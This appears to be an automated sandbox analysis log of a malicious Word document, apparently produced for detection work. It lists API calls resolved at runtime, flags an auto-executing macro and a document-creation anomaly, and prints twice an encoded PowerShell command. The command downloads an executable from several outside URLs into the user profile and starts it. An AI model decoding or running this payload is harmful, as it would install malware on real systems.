DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: USER32.dll/GetWindow
DynamicLoader: USER32.dll/IsWindowVisible
DynamicLoader: USER32.dll/IsWindowVisibleW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/GetModuleFileName
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: rasapi32.dll/RasEnumConnections
DynamicLoader: rasapi32.dll/RasEnumConnectionsW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: rtutils.dll/TraceRegisterExA
DynamicLoader: rtutils.dll/TracePrintfExA
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: WS2_32.dll/WSAStartup
DynamicLoader: WS2_32.dll/WSASocket
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/closesocket
DynamicLoader: kernel32.dll/GetComputerName
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptor
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/CreateFileMapping
DynamicLoader: kernel32.dll/CreateFileMappingW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: ADVAPI32.dll/CreateWellKnownSidW
DynamicLoader: kernel32.dll/CreateMutex
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/OpenMutex
DynamicLoader: kernel32.dll/OpenMutexW
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: kernel32.dll/GetProcessTimes
DynamicLoader: kernel32.dll/GetProcessTimesW
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: kernel32.dll/FormatMessage
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: rasapi32.dll/RasConnectionNotification
DynamicLoader: rasapi32.dll/RasConnectionNotificationW
DynamicLoader: ADVAPI32.dll/RegOpenCurrentUser
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: winhttp.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: winhttp.dll/WinHttpDetectAutoProxyConfigUrl
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: IPHLPAPI.DLL/GetNetworkParams
DynamicLoader: DNSAPI.dll/DnsQueryConfig
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: IPHLPAPI.DLL/GetIpInterfaceEntry
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/inet_addr
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/freeaddrinfo
DynamicLoader: WS2_32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: DUser.dll/ForwardGadgetMessage
DynamicLoader: DUser.dll/SetGadgetFocusEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: DUser.dll/DisableContainerHwnd
DynamicLoader: UxTheme.dll/BufferedPaintUnInit
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
The office file contains 2 macros
The office file contains a macro with auto execution
autoopen: Runs when the Word document is opened
The office file contains anomalous features
creation_anomaly: The file appears to have an edit time yet has no creation time or last saved time. This can be a sign of an automated document creation kit.
A scripting utility was executed
command: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0